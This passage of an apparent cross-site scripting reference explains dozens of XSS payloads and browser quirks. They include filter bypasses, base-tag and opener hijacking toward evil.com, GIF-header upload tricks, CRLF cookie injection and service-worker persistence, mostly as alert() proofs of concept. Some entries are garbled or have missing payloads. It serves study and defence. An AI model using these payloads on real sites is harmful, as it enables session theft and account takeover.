5.9 <iframe src="data:),"></iframe> (Firefox)
Important to know: Data URI iframe in Firefox. Firefox allows data: URIs in iframes that can execute JavaScript. The payload alerts the document's domain.
| Term | Explanation |
|---|---|
| <iframe src="data:),"></iframe> (Firefox) | Firefox-specific data URI iframe. Executes script in the iframe context. |
5.10
Important to know: The <embed> tag loads Flash files. allowscriptaccess=always allows the Flash file to execute JavaScript in the page via ExternalInterface.call(). This is a critical security control.
| Term | Explanation |
|---|---|
| Embed Flash with full script access. Flash can call JavaScript functions in the page. |
5.11 (Chrome)
Important to know: In Chrome, <embed> uses code attribute (instead of src for older syntax). Same allowscriptaccess=always risk.
| Term | Explanation |
|---|---|
| (Chrome) | Chrome embed syntax with code attribute. Flash can execute JavaScript. |
5.12 \ \ base
Important to know: This refers to escaping backslashes and the <base> tag. The <base href="..."> tag changes relative URLs for the entire page. Attackers can inject <base href="//evil.com/"> to redirect all relative requests to an attacker-controlled server.
| Term | Explanation |
|---|---|
| \ \ base | Backslash escape sequences and the <base> tag. \\ may represent path confusion. |
5.13 <base href="/\evil'>
Important to know: Malicious <base> tag with a broken href value (/\evil'). This can cause relative URLs to resolve incorrectly, leading to script injection or resource hijacking.
| Term | Explanation |
|---|---|
| <base href="/\evil'> | Base tag with malformed href. May cause relative script/src paths to point to attacker domain. |
PART 6: COMMENTS, CDATA, DOCTYPE, AND SPECIAL TAGS
6.1
Important to know: This uses an HTML comment start (<!--), then an SVG tag, then a comment end (-->). However, the SVG tag is inside a comment? The exact behavior varies. May be a typo for <svg onload=alert(1)--> or similar.
| Term | Explanation |
|---|---|
Comment trick. <!-- opens comment, --> closes. SVG inside comment may still execute in some parsers. |
6.2 <| '="foo"> (IE 6-9)
Important to know: Another IE parsing bug using <| as a tag name. IE treats <| as a valid tag, allowing injection of attributes and nested elements. Similar to the <x '="foo"> vector.
| Term | Explanation |
|---|---|
| < | '="foo"> (IE 6-9) |
6.3 <![if<iframe/onload=alert(1)//|>
Important to know: Conditional comment in IE. <!--[if ...]> ... <![endif]--> are IE-specific conditional comments. This payload abuses the conditional comment syntax to inject an iframe with onload.
| Term | Explanation |
|---|---|
| <![if<iframe/onload=alert(1)// | > |
6.4 <![CDATA
Important to know: CDATA (Character Data) sections in XML/XHTML: <![CDATA[ ... ]]>. Content inside CDATA is not parsed as markup. However, closing the CDATA section (]]>) can break out.
| Term | Explanation |
|---|---|
| <![CDATA | CDATA section start. Used in XML/XHTML contexts. Attackers close CDATA then inject script. |
6.5 <!doctype
Important to know: The DOCTYPE declaration (<!DOCTYPE html>) defines document type. It is rarely an injection vector but can be used in some XML-based XSS scenarios.
| Term | Explanation |
|---|---|
| <!doctype | Document type declaration. Can be part of a payload in XML contexts. |
6.6 <% contenteditable
Important to know: The contenteditable HTML attribute makes an element editable by the user. Attackers can inject HTML into editable areas, leading to XSS if the content is later rendered unsanitized.
| Term | Explanation |
|---|---|
| <% contenteditable | ASP/embedded code delimiter (<%) combined with contenteditable attribute. May be used for injection. |
6.7 onresize=alert(1)> (IE 11,9 mode)
Important to know: The onresize event fires when the browser window or frame is resized. This payload triggers alert when the user resizes. Works in IE 11 (IE9 compatibility mode).
| Term | Explanation |
|---|---|
| onresize=alert(1)> (IE 11,9 mode) | onresize event handler. Triggers when window resizes. IE-specific quirks. |
6.8 <?'="foo"> (IE 6-9)
Important to know: Using <? as a tag name (XML processing instruction start). IE treats <? as a valid tag, leading to similar injection as <|.
| Term | Explanation |
|---|---|
| <?'="foo"> (IE 6-9) | IE parsing bug with <? as tag name. Injects <img> with onerror. |
6.9 <[00]script>alert(1)</[00]script> (IE<=9)
Important to know: Null byte (%00, ASCII 0) injection inside tag names. IE ignores null bytes, so <[00]script> is parsed as <script>. This bypasses filters that don't strip nulls.
| Term | Explanation |
|---|---|
| <[00]script>alert(1)</[00]script> (IE<=9) | Null byte inside <script> tag. IE ignores null byte, sees <script>. |
6.10 UTF-7: +ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4- (IE)
Important to know: UTF-7 encoding attack. +ADw- = <, +AD4- = >. The payload decodes to <script>alert(document.cookie)</script>. This works only if the page is served with UTF-7 charset (rare).
| Term | Explanation |
|---|---|
| UTF-7: +ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4- (IE) | UTF-7 encoded XSS. Decodes to <script>alert(document.cookie)</script>. |
PART 7: JAVASCRIPT SOURCES AND DOM PROPERTIES
7.1 location.href
Important to know: location.href is a property that gets or sets the current URL. If an attacker controls a value assigned to location.href, they can redirect to a javascript: URI.
| Term | Explanation |
|---|---|
| location.href | URL of current page. Assignment: location.href = "javascript:alert(1)" executes script. |
7.2 location.search
Important to know: location.search returns the query string portion of the URL (?param=value). If reflected into DOM without encoding, XSS occurs.
| Term | Explanation |
|---|---|
| location.search | Query string of URL. Common source for reflected XSS. |
7.3 IE don't URL encode <>
Important to know: Internet Explorer does not URL encode < and > characters in location.search when accessed via JavaScript. This means a payload like ?q=<script> can be injected.
| Term | Explanation |
|---|---|
| IE don't URL encode <> | IE-specific behavior: angle brackets in query string are not URL-encoded, allowing direct injection. |
7.4 location
Important to know: The location object (window.location) has many properties: href, hash, search, pathname, protocol, host, hostname, port. Each can be a source of untrusted input.
| Term | Explanation |
|---|---|
| location | The window.location object. Contains URL components that may be reflected. |
7.5 location.hash
Important to know: location.hash returns the fragment identifier (#anchor). It is often reflected into the page without server-side encoding because it's not sent to the server. Common for DOM XSS.
| Term | Explanation |
|---|---|
| location.hash | URL fragment after #. Example: #<script>alert(1)</script>. Not sent to server. |
7.6 location.pathname
Important to know: location.pathname returns the URL path (/folder/page.html). Can be a source if reflected into DOM.
| Term | Explanation |
|---|---|
| location.pathname | Path portion of URL. May contain user-controlled parts in URL routing. |
7.7 window.name
Important to know: window.name is a property that persists across page navigations (same tab). Attackers can set window.name to a malicious value from one page, then navigate to a vulnerable page that uses window.name unsafely.
| Term | Explanation |
|---|---|
| window.name | Window name property. Persists across page loads. Common for DOM XSS vectors. |
7.8 document.cookie
Important to know: document.cookie contains the page's cookies. An XSS payload can read document.cookie to steal session tokens. This is why HttpOnly cookies are important (not accessible to JavaScript).
| Term | Explanation |
|---|---|
| document.cookie | Cookie string. alert(document.cookie) steals session tokens if not HttpOnly. |
7.9 localStorage
Important to know: localStorage is a persistent key-value store (5-10MB) that survives browser restarts. XSS can read/write localStorage, stealing or poisoning stored data.
| Term | Explanation |
|---|---|
| localStorage | HTML5 local storage. XSS can read localStorage.getItem('token') or write malicious data. |
7.10 document.title
Important to know: The page title (<title> tag). If user input influences the title, XSS is possible via document.title injection.
| Term | Explanation |
|---|---|
| document.title | Page title. Can be a source if user input is placed in <title> without encoding. |
7.11 getAttribute
Important to know: The getAttribute() method reads HTML attributes. If an attacker controls the attribute name or element, they can retrieve sensitive data.
| Term | Explanation |
|---|---|
| getAttribute | DOM method: element.getAttribute('src'). Can be abused if attacker controls arguments. |
7.12 document.referrer
Important to know: document.referrer contains the URL of the previous page. Attackers can craft a malicious referrer URL containing XSS payload that gets reflected.
| Term | Explanation |
|---|---|
| document.referrer | Referring page URL. Can contain malicious payload if reflected. |
7.13 innerText
Important to know: innerText sets or gets the text content of an element (HTML is not parsed). However, setting innerText to user input can still be safe, but if the input is later used in innerHTML, XSS occurs.
| Term | Explanation |
|---|---|
| innerText | Text content property. Does not parse HTML, safer than innerHTML. |
7.14 value
Important to know: The value property of form inputs (<input>, <textarea>, <select>). User input in value attributes is common for XSS.
| Term | Explanation |
|---|---|
| value | Input field value. Example: document.forms[0].user.value. |
7.15 dataset
Important to know: The dataset property gives access to data-* attributes (element.dataset.userId). Attackers may inject into data- attributes.
| Term | Explanation |
|---|---|
| dataset | DOM property for custom data-* attributes. element.dataset.xss = 'alert(1)'. |
7.16 Use backlash { ) bypass origin check code
Important to know: Backslash escaping (\) can bypass origin checks. For example, javascript:alert(1) with backslashes: javasc\ript:alert(1). Some parsers ignore backslashes.
| Term | Explanation |
|---|---|
| Use backlash { ) bypass origin check code | Backslash injection. javasc\ript:alert(1) becomes javascript:alert(1) after backslash removal. |
PART 8: NOSCRIPT, LISTING, POSTMESSAGE, AND ADVANCED VECTORS
8.1 <a src='x' style="x: \3c\2fnoscript\3e\3ciframe/onload\3d alert(1)\3e'> (IE11, 0.0.2)
Important to know: The <noscript> tag renders content only when JavaScript is disabled. This payload injects CSS escape sequences (\3c = <, \2f = /, \3e = >, \3d = =). It closes <noscript>, then injects an iframe with onload.
| Term | Explanation |
|---|---|
| <a src='x' style="x: \3c\2fnoscript\3e\3ciframe/onload\3d alert(1)\3e'> (IE11, 0.0.2) | CSS escape sequences in style attribute. Decodes to </noscript><iframe/onload=alert(1)>. |
8.2 <img src=1 onerror=alert(1) >:
Important to know: The <listing> tag (obsolete, similar to <pre>) renders content as preformatted text. However, if HTML entities (<, >:) are decoded, the <img> tag may execute. >: is a malformed entity.
| Term | Explanation |
|---|---|
| <img src=1 onerror=alert(1) >: | Listing tag with encoded img. If decoded, img with onerror executes. |
8.3 postMessage
Important to know: window.postMessage() allows cross-origin communication. If a page listens for messages and uses the data unsafely (e.g., eval(event.data) or innerHTML), an attacker can send malicious messages from any origin.
| Term | Explanation |
|---|---|
| postMessage | Cross-origin messaging API. XSS via unsanitized message data: window.addEventListener('message', function(e) { eval(e.data); }). |
8.4 <img src="test.jpg" al=""“onload=xss()">
Important to know: Malformed alt attribute with extra quotes. The al=""“onload=xss()" creates an onload attribute due to improper parsing of quotes.
| Term | Explanation |
|---|---|
| <img src="test.jpg" al=""“onload=xss()"> | Broken attribute injection. Extra quotes create onload attribute. |
8.5 123
Important to know: Custom XML namespace injection. The xmlns attribute defines an XML namespace. The payload injects an iframe with onload. The <pkav> tag is a custom tag.
| Term | Explanation |
|---|---|
| 123 | Custom tag with XML namespace. Closes the namespace attribute and injects iframe. |
8.6
Important to know: CSS escape sequence injection. \27 = ' (apostrophe), \3b = ;, \3a = :, \28 = (, \29 = ). Decodes to ar';x:expression(xss())ial. This creates an IE expression() payload.
| Term | Explanation |
|---|---|
CSS escape sequences for expression(). Bypasses filters looking for literal 'expression'. |
8.7 
Important to know: CSS injection inside style attribute of an <img> tag. \22 = ", \3d = =, \28 = (, \29 = ), \20 = space. Decodes to onerror=alert(1). This creates an event handler inside the style attribute.
| Term | Explanation |
|---|---|
CSS escape sequence creating onerror=alert(1) inside style attribute. |
8.8 <% a=h8gtaltiframe/ onload=alert(1)//>
Important to know: ASP/embedded code injection (<%). The a=h8gt is likely a variable assignment. altiframe is a tag name. The payload injects an iframe with onload.
| Term | Explanation |
|---|---|
| <% a=h8gtaltiframe/ onload=alert(1)//> | ASP code delimiter followed by malformed tag. Injects iframe/onload. |
8.9 <img ="><script>alert(1)</script>">
Important to know: Malformed <img> tag where the attribute name is missing (<img =">). The browser may still parse the following <script> tag.
| Term | Explanation |
|---|---|
| <img ="><script>alert(1)</script>"> | Invalid attribute syntax (= without name). Script tag executes. |
8.10 <div="/ X="''><iframe/ onload=alert(1) >'>
Important to know: Complex injection with HTML entities and malformed attributes. " = ", ' = ', > = >, < = <. Decodes to X="'><iframe/ onload=alert(1) >'.
| Term | Explanation |
|---|---|
| <div="/ X="''><iframe/ onload=alert(1) >'> | HTML entity soup. Decodes to inject iframe with onload. |
8.11 click
Important to know:   is the Ideographic Space (full-width space) character (U+3000). Some parsers treat it as whitespace, so  javascript: becomes javascript: after decoding, bypassing filters that look for space or colon directly after javascript.
| Term | Explanation |
|---|---|
| click | Full-width space (U+3000) before javascript:. Bypasses keyword detection. |
8.12 location="javascript:"<script>alert(document)</script>"
Important to know: Setting location to a string that starts with javascript: but continues with HTML. The browser may parse the javascript: and then the HTML after it.
| Term | Explanation |
|---|---|
| location="javascript:"<script>alert(document)</script>" | Mixed JavaScript and HTML. Location set to javascript: then script tag. |
8.13 display:block;position:absolute;top:0;left:0;width:1000px;height:1000px;background:red
Important to know: This is CSS for a full-page overlay. Attackers use this to cover the entire page with a malicious element that intercepts clicks or displays fake content (phishing).
| Term | Explanation |
|---|---|
| display:block;position:absolute;top:0;left:0;width:1000px;height:1000px;background:red | CSS to create a full-page overlay. Used in clickjacking or UI redressing attacks. |
8.14 Non-equal: -<script/defer>alert(1)</script>
Important to know: The defer attribute on <script> delays execution until the page finishes parsing. The - before <script may be a typo or used to break a previous context.
| Term | Explanation |
|---|---|
| Non-equal: -<script/defer>alert(1)</script> | Script tag with defer attribute. defer does not prevent execution. |
8.15 <iframe/src=about:blank onload=alert(1)>
Important to know: <iframe> with src=about:blank (empty page) and onload event. The onload triggers when the iframe loads the blank page, executing JavaScript.
| Term | Explanation |
|---|---|
| <iframe/src=about:blank onload=alert(1)> | Iframe loads about:blank, onload fires immediately. |
8.16 document.domain='25 .2207
Important to know: Setting document.domain changes the page's origin for same-origin policy. Normally you can only set it to a parent domain (e.g., sub.example.com → example.com). This payload appears malformed ('25 .2207) but may represent an attempt to bypass domain restrictions.
| Term | Explanation |
|---|---|
| document.domain='25 .2207 | Malformed domain assignment. Attempt to set document.domain to bypass SOP. |
8.17 Break area
Important to know: Breaking out of an <a> (anchor) tag context. If input is inside an <a href="..."> attribute, you need to close the attribute (") and the tag (>) before injecting new HTML.
| Term | Explanation |
|---|---|
| Break area | Techniques to exit <a> tag context: "> or '><img onerror=...> |
PART 9: INNERHTML, DOCUMENT WRITE, AND DYNAMIC EXECUTION
9.1 InnerHTML exec JS POC
Important to know: Setting innerHTML to a string containing <script> tags does NOT execute the script (by design). However, event handlers (<img onerror>) and other vectors (SVG, iframe) do execute. This is a common misconception.
| Term | Explanation |
|---|---|
| InnerHTML exec JS POC | Proof of concept: <img src=x onerror=alert(1)> works when set via innerHTML. <script> does not. |
9.2 <iframe/src=about:blank onload=alert(1)>
Important to know: Duplicate entry. (See 8.15)
| Term | Explanation |
|---|---|
| <iframe/src=about:blank onload=alert(1)> | Iframe vector. Works in innerHTML because onload is an event handler. |
9.3 Cross to other subdomain
Important to know: XSS on one subdomain (e.g., xss.victim.com) can often access data on another subdomain (admin.victim.com) if document.domain is set to the parent domain (victim.com). This is a subdomain takeover risk.
| Term | Explanation |
|---|---|
| Cross to other subdomain | XSS on one subdomain can escalate to other subdomains via document.domain modification. |
9.4 alert(username);function username(){} (IE)
Important to know: In IE, if a function is defined with the same name as a variable, the function definition can override or interfere with variable access. This is a quirk that can be used for obfuscation.
| Term | Explanation |
|---|---|
| alert(username);function username(){} (IE) | IE-specific function/variable hoisting quirk. username is both a variable and function. |
9.5 SWE
Important to know: HTML Import (deprecated). SWE may be a note (Same Window Execution?). Loading a non-HTML file (test.png) as an import may still execute scripts if the MIME type is misconfigured.
| Term | Explanation |
|---|---|
| SWE | HTML Import with PNG file. If server returns HTML or JavaScript, script executes. |
9.6 Define variable in advance
Important to know: If you can define a variable before it is used in a vulnerable context, you can control its value. Example: var x = alert; x(1) becomes alert(1).
| Term | Explanation |
|---|---|
| Define variable in advance | Pre-defining variables to hijack function calls or values in later code. |
9.7 CSP bypass FWS ='BACONBACON'-alert(1)//
Important to know: Content Security Policy (CSP) bypass using string manipulation. FWS may be a variable. 'BACONBACON'-alert(1) is invalid JavaScript, but the comment // hides the error. This may be a specific CSP bypass technique.
| Term | Explanation |
|---|---|
| CSP bypass FWS ='BACONBACON'-alert(1)// | Attempt to bypass CSP using arithmetic/string operations. |
9.8 GIF89a= 'MUMBOJUMBOBOGUSBACON';alert(1)//
Important to know: GIF file header injection. Many image upload filters check the magic bytes (first few bytes) of files. GIF89a is the header for GIF images. By placing GIF89a= then JavaScript, attackers can upload a file that passes as an image but contains script.
| Term | Explanation |
|---|---|
| GIF89a= 'MUMBOJUMBOBOGUSBACON';alert(1)// | GIF header spoofing. File starts with GIF89a, passes image validation, but contains JavaScript. |
9.9 GIF89a/[all lzw data]/ \x3Bjavascript_payload
Important to know: Another GIF injection. /*[all lzw data]*/ is a comment containing LZW compression data. The \x3B is a semicolon (;). The javascript_payload is the malicious code. The semicolon closes the comment.
| Term | Explanation |
|---|---|
| GIF89a/[all lzw data]/ \x3Bjavascript_payload | GIF header with comment block, semicolon to exit comment, then JavaScript payload. |
9.10
Important to know: The X-UA-Compatible meta tag forces IE to render the page in a specific compatibility mode (e.g., IE=7). This can re-enable vulnerabilities that were patched in newer IE versions (like CSS expressions in IE 7 mode).
| Term | Explanation |
|---|---|
| Force IE7 mode. Re-enables legacy vulnerabilities (VML, CSS expressions, etc.). |
9.11 Bypass IE xss filter:
Important to know: The IE XSS filter (introduced in IE 8) can be disabled by forcing IE7 mode via X-UA-Compatible: IE=7. The IE7 mode does not have the XSS filter. This is a known bypass.
| Term | Explanation |
|---|---|
| Bypass IE xss filter: | Force IE7 mode to disable IE's built-in XSS filter. |
9.12 Upload File header check bypass
Important to know: Many upload filters check only the first few bytes (magic bytes) to validate file type. Attackers prepend GIF header (GIF89a) or PNG header (\x89PNG) to a JavaScript file. The file passes validation but contains script at the end.
| Term | Explanation |
|---|---|
| Upload File header check bypass | Prepend valid image headers to JavaScript files. Example: GIF89a<script>alert(1)</script>. |
9.13 IE downgrade vector
Important to know: Forcing IE to render in older (more vulnerable) document modes via X-UA-Compatible meta tag or HTTP header. Downgrading to IE5 or IE7 enables legacy XSS vectors.
| Term | Explanation |
|---|---|
| IE downgrade vector | Force IE to emulate older version (IE5, IE7, IE8) to bypass modern security features. |
9.14 Flash reflect XSS convert Store XSS
Important to know: Flash applications often reflect user input. A reflected XSS in Flash can sometimes be converted to persistent (stored) XSS if the Flash app stores the data and later outputs it unsafely.
| Term | Explanation |
|---|---|
| Flash reflect XSS convert Store XSS | Reflected XSS in Flash can become stored XSS if Flash saves data to a shared object or server. |
9.15 IE content-type sniff spoof
Important to know: IE performs MIME sniffing – it ignores the Content-Type header and guesses the type based on content. An attacker can upload a file with Content-Type: text/plain but containing HTML/script. IE may sniff it as HTML and execute.
| Term | Explanation |
|---|---|
| IE content-type sniff spoof | Upload file with wrong Content-Type. IE sniffs content and executes as HTML/script. |
9.16 Cross domain traditional data
Important to know: Traditional cross-domain data access methods: JSONP (<script src="https://other.com/api?callback=func">), CORS, document.domain, postMessage. XSS can use these to exfiltrate data across origins.
| Term | Explanation |
|---|---|
| Cross domain traditional data | JSONP, CORS, postMessage, document.domain for cross-origin data access. |
9.17 Hook variable via ID attribute
Important to know: In older browsers, elements with an id attribute become global variables. <div id="xss"></div> creates window.xss. Attackers can hook (override) existing variables by injecting elements with the same ID.
| Term | Explanation |
|---|---|
| Hook variable via ID attribute | Inject element with id="existingVar" to override global variable. |
9.18 Block Script tag via Webkit XSS auditor
Important to know: Webkit's XSS Auditor (Chrome, Safari) blocks <script> tags that appear to be reflected. Attackers bypass by using event handlers (<img onerror>), SVG, or splitting the tag across multiple parameters.
| Term | Explanation |
|---|---|
| Block Script tag via Webkit XSS auditor | Chrome's XSS Auditor blocks reflected <script>. Use non-script vectors like <img onerror>. |
PART 10: IFRAME STYLE, OBJECT, AND WINDOW NAME VECTORS
10.1 <iframe style=dis| sump xss></iframe>
Important to know: Malformed style attribute (style=dis| sump). The | and space may break filter detection. The content "sump xss" may be placeholder. Injects an iframe.
| Term | Explanation |
|---|---|
| <iframe style=dis | sump xss></iframe> |
10.2 || allowScriptAccess = samedomain
Important to know: The <object> tag loading a malicious SWF file. The allowScriptAccess = samedomain (or always) allows the Flash file to call JavaScript in the page. Attackers host a malicious SWF that calls ExternalInterface.call('alert',1).
| Term | Explanation |
|---|---|
10.3 Vison?a.html AU Vison;.html
Important to know: This appears to be a note about URL parsing quirks. Vison?a.html – the ? starts a query string. Vison;.html – semicolon in filename. Attackers use these to bypass file extension checks.
| Term | Explanation |
|---|---|
| Vison?a.html AU Vison;.html | URL trickery. ? and ; in filenames to bypass extension validation. |
10.4 1. window.name='exp' 2. location='//target' window name
Important to know: Two-step XSS technique: Step 1 – set window.name to a malicious payload. Step 2 – navigate to the target page. The target page may read window.name and use it unsafely (DOM XSS).
| Term | Explanation |
|---|---|
| 1. window.name='exp' 2. location='//target' window name | Set window.name payload, then navigate to target. Target reflects window.name unsafely. |
10.5 <iframe src="target" name="exp">
Important to know: Creating an iframe with name="exp" sets window.name for that iframe. When the iframe loads the target page, the target can read the name.
| Term | Explanation |
|---|---|
| <iframe src="target" name="exp"> | Iframe with name attribute. Target page can access window.name of the iframe. |
10.6
Important to know: A link with target="exp" will open in the iframe named "exp". This can be used to trigger XSS by navigating the iframe to a vulnerable page while preserving window.name.
| Term | Explanation |
|---|---|
| Link targeting an existing iframe/window name. Maintains window.name across navigations. |
10.7 location.hash
Important to know: (See 7.5) URL fragment. Used for DOM XSS because it's not sent to server.
| Term | Explanation |
|---|---|
| location.hash | URL fragment (#value). Common DOM XSS source. |
10.8
Important to know: Malicious form with id="window'" (contains a quote). The quote may break out of a JavaScript string context. The <input "> is malformed.
| Term | Explanation |
|---|---|
| Form with id containing quote. Injects into JavaScript string. |
10.9 <script>x='javascript:alert(1)'</script> (IE)
Important to know: In IE, assigning a javascript: URI to a variable and then using that variable in a location assignment may execute the script. Example: var x = 'javascript:alert(1)'; location = x;.
| Term | Explanation |
|---|---|
| <script>x='javascript:alert(1)'</script> (IE) | IE executes javascript: URI when assigned to location via variable. |
10.10 <script>x.toString()}=='123'</script>
Important to know: This appears to be testing JavaScript type coercion and string conversion. x.toString() calls the toString method. The payload may be part of a prototype pollution attack.
| Term | Explanation |
|---|---|
| <script>x.toString()}=='123'</script> | Type coercion testing. May be part of prototype pollution or object injection. |
10.11 <a href="123" id="x'>test
Important to know: Anchor tag with id containing a quote (x'). This can break out of a JavaScript string context if the id is reflected.
| Term | Explanation |
|---|---|
| <a href="123" id="x'>test | ID attribute with quote. Injects into JavaScript string when getElementById is used. |
10.12 2abc=<script>[page data]</script>
Important to know: This may be a parameter name (2abc) that contains an entire script tag. The [page data] is a placeholder for whatever data the page outputs.
| Term | Explanation |
|---|---|
| 2abc=<script>[page data]</script> | Parameter named 2abc with script tag value. Reflected XSS. |
10.13 play:none src=//
Important to know: CSS display:none hides an element. Attackers hide malicious iframes or images (src=// points to current origin or empty). The element executes its onload even if hidden.
| Term | Explanation |
|---|---|
| play:none src=// | Hidden element (display:none) with src=// (current origin). Executes onload while invisible. |
10.14 history.replaceState + redirect
Important to know: history.replaceState() modifies the browser history without reloading. Combined with redirect, attackers can hide the malicious URL from the address bar or prevent the user from navigating back.
| Term | Explanation |
|---|---|
| history.replaceState + redirect | Modify browser history to hide malicious URL or break back button. |
PART 11: PERSISTENCE, ROOTKITS, AND ADVANCED ATTACKS
11.1 Infect old data RE2ZRB0%AB
Important to know: Infecting old data (cached, stored, or previously saved) with XSS. The string RE2ZRB0%AB may be a payload or identifier. %AB is a URL-encoded byte.
| Term | Explanation |
|---|---|
| Infect old data RE2ZRB0%AB | Injecting XSS into stored/cached data that will be displayed later. |
11.2 Rootkit
Important to know: Browser rootkits persist across browser restarts, tabs, and domains. They use techniques like: service workers, extension injection, Flash SharedObjects, HTML5 AppCache, and localStorage to survive.
| Term | Explanation |
|---|---|
| Rootkit | Persistent browser malware that survives restarts. Uses Service Workers, AppCache, etc. |
11.3 Persistence XSS
Important to know: Stored (persistent) XSS is stored on the server (database, file, log) and affects all users who view the data. This is more dangerous than reflected XSS.
| Term | Explanation |
|---|---|
| Persistence XSS | Stored XSS. Payload saved in database. Executes every time the page is viewed. |
11.4 Frame page
Important to know: Framing attacks: iframe, frameset, or object tags that load malicious content. Can be used for clickjacking, stealing data, or executing XSS in the context of the framed page.
| Term | Explanation |
|---|---|
| Frame page | Using iframes or frames to embed malicious content or hijack parent page. |
11.5 Opener hijack
Important to know: When a page opens a new window/tab using window.open() or <a target="_blank">, the new page can access the opener object (which points back to the original page). The new page can modify the original page's DOM, steal data, or redirect it.
| Term | Explanation |
|---|---|
| Opener hijack | New window modifies its opener page via window.opener. Example: opener.location = 'https://evil.com'. |
11.6 Open window event hook
Important to know: Hooking (intercepting) events from opened windows. The opener can add event listeners to the child window's load event, etc.
| Term | Explanation |
|---|---|
| Open window event hook | Opener page listens to events on child window. |
11.7 HTTP response cache
Important to know: Cached HTTP responses can be poisoned with XSS. If a malicious response is cached by a CDN or proxy, it serves the XSS payload to all users.
| Term | Explanation |
|---|---|
| HTTP response cache | Cache poisoning. Attacker forces a malicious response to be cached. |
11.8 XSS-Proxy
Important to know: XSS-Proxy is a tool that creates a persistent backdoor via XSS. It allows an attacker to send commands to the victim's browser and receive responses, effectively controlling the browser.
| Term | Explanation |
|---|---|
| XSS-Proxy | Tool for persistent browser control via XSS. Attacker sends JavaScript commands remotely. |
11.9 Intranet border
Important to know: XSS on a public-facing website can be used to scan and attack internal (intranet) systems because the victim's browser has access to internal IP addresses and services.
| Term | Explanation |
|---|---|
| Intranet border | XSS pivoting from public to internal network. Victim's browser can access 192.168.x.x, 10.x.x.x. |
11.10 XSS-intranet
Important to know: Using XSS to attack internal intranet applications (e.g., internal wikis, admin panels, Jenkins, GitLab) that are not directly accessible from the internet.
| Term | Explanation |
|---|---|
| XSS-intranet | XSS payloads targeting internal network services via victim's browser. |
11.11 Browser
Important to know: The browser is the execution environment. Different browsers have different XSS quirks, security features, and supported vectors.
| Term | Explanation |
|---|---|
| Browser | Chrome, Firefox, Edge, Safari, IE. Each has unique XSS behavior and bypasses. |
11.12 Local border
Important to know: Attacks that cross from a web page to the local system (e.g., reading local files, accessing localhost services, or exploiting browser extensions).
| Term | Explanation |
|---|---|
| Local border | Crossing from web origin to localhost or local file system. |
11.13 Inner-webview
Important to know: Mobile apps often use WebViews (embedded browsers). XSS in a WebView can potentially access native app functions via JavaScript bridges (addJavascriptInterface in Android).
| Term | Explanation |
|---|---|
| Inner-webview | Embedded browser in mobile app. XSS can exploit JavaScript-to-native bridges. |
11.14 Still work
Important to know: Notes that a particular vector or technique still works in modern browsers despite patches. Attackers maintain lists of "still working" vectors.
| Term | Explanation |
|---|---|
| Still work | XSS vector that remains unpatched in current browser versions. |
PART 12: COOKIE PERSISTENCE, STORAGE, AND CACHE
12.1 Prevent expired: Set max-age=99999999
Important to know: Cookies have a max-age attribute (seconds until expiration). Setting max-age=99999999 (approximately 3 years) makes the cookie persist almost forever. Attackers set long expiration on session cookies to maintain access.
| Term | Explanation |
|---|---|
| Prevent expired: Set max-age=99999999 | Set cookie expiration far in future (~3 years) for persistence. |
12.2 Prevent overwritten: Set domain field to top-domain
Important to know: When setting a cookie, the domain attribute determines which subdomains can access it. Setting domain=.example.com makes the cookie accessible to all subdomains. Attackers do this to prevent the cookie from being overwritten by subdomain-specific cookies.
| Term | Explanation |
|---|---|
| Prevent overwritten: Set domain field to top-domain | Set cookie domain to parent domain (.example.com) for cross-subdomain persistence. |
12.3 CRLF Inject set-cookie
Important to know: CRLF (Carriage Return + Line Feed: \r\n) injection in HTTP headers can create arbitrary headers. An attacker can inject Set-Cookie: headers to create or modify cookies.
| Term | Explanation |
|---|---|
| CRLF Inject set-cookie | CRLF injection in response header. Example: %0d%0aSet-Cookie: session=evil |
12.4 Flash SharedObject
Important to know: Flash SharedObjects (Flash cookies) are like browser cookies but stored by Flash. They persist even if browser cookies are cleared. XSS can read/write SharedObjects via Flash.
| Term | Explanation |
|---|---|
| Flash SharedObject | Flash local storage (Flash cookies). Persists across browser sessions. |
12.5 setLocal
Important to know: This likely refers to localStorage.setItem(). XSS can write arbitrary data to localStorage, which persists across browser restarts.
| Term | Explanation |
|---|---|
| setLocal | localStorage.setItem(key, value). Persistent client-side storage. |
12.6 setitem
Important to know: sessionStorage.setItem() (sessionStorage clears when tab closes) or localStorage.setItem(). Attackers use these for persistence.
| Term | Explanation |
|---|---|
| setitem | setItem method of Storage API. XSS can store malicious data. |
12.7 navigator.serviceWorker.register
Important to know: Service workers are scripts that run in the background, intercept network requests, and can persist even after the page is closed. An attacker who registers a malicious service worker can control all future requests to the origin, effectively a persistent backdoor.
| Term | Explanation |
|---|---|
| navigator.serviceWorker.register | Register a service worker. Malicious worker intercepts all fetch requests to the origin. |
12.8 HTML5 Appcache
Important to know: Application Cache (AppCache, deprecated, replaced by Service Workers) allowed websites to work offline. A malicious manifest file can force the browser to cache an XSS-infected version of the page permanently.
| Term | Explanation |
|---|---|
| HTML5 Appcache | Manifest cache. Malicious manifest caches XSS payload forever. |
12.9 1. No border iframe
Important to know: An iframe with no border (CSS border: none or frameborder="0") is invisible to the user. Attackers use invisible iframes for background attacks (data theft, CSRF, scanning).
| Term | Explanation |
|---|---|
| 1. No border iframe | Invisible iframe (frameborder="0" style="display:none"). Used for stealth attacks. |
12.10 Address bar sync a
Important to know: Synchronizing the address bar with malicious content. Using history.pushState or location.hash to change the URL without reloading, making the attack harder to detect.
| Term | Explanation |
|---|---|
| Address bar sync | Manipulating browser history to hide malicious URL or fake legitimate URL. |
12.11 opener.eval(...exp...)
Important to know: If an attacker controls a child window (via window.open), they can call opener.eval('...') to execute arbitrary JavaScript in the parent page's context, even if the child is cross-origin (in some browsers).
| Term | Explanation |
|---|---|
| opener.eval(...exp...) | Child window executes code in parent via opener.eval(). |
12.12
Important to know: Links with target="_blank" without rel="noopener noreferrer" allow the new page to access window.opener. Attackers exploit this for opener hijacking.
| Term | Explanation |
|---|---|
Link opening new tab. Without rel=noopener, new tab can access opener. |
12.13
Important to know: Forms with target="_blank" also allow access to the opener via window.opener.
| Term | Explanation |
|---|---|
Form submission to new tab. New tab can access opener if no rel attribute. |
12.14 window.open
Important to know: JavaScript method to open new windows/tabs. The opened window has an opener reference back to the original.
| Term | Explanation |
|---|---|
| window.open | Opens new browser window/tab. Returns reference to the new window. |
12.15 HPP (HTTP Parameter Pollution)
Important to know: HTTP Parameter Pollution occurs when multiple parameters with the same name are sent. Different servers handle duplicates differently (first, last, concatenate). Attackers use HPP to bypass WAF filters or inject XSS across parameters.
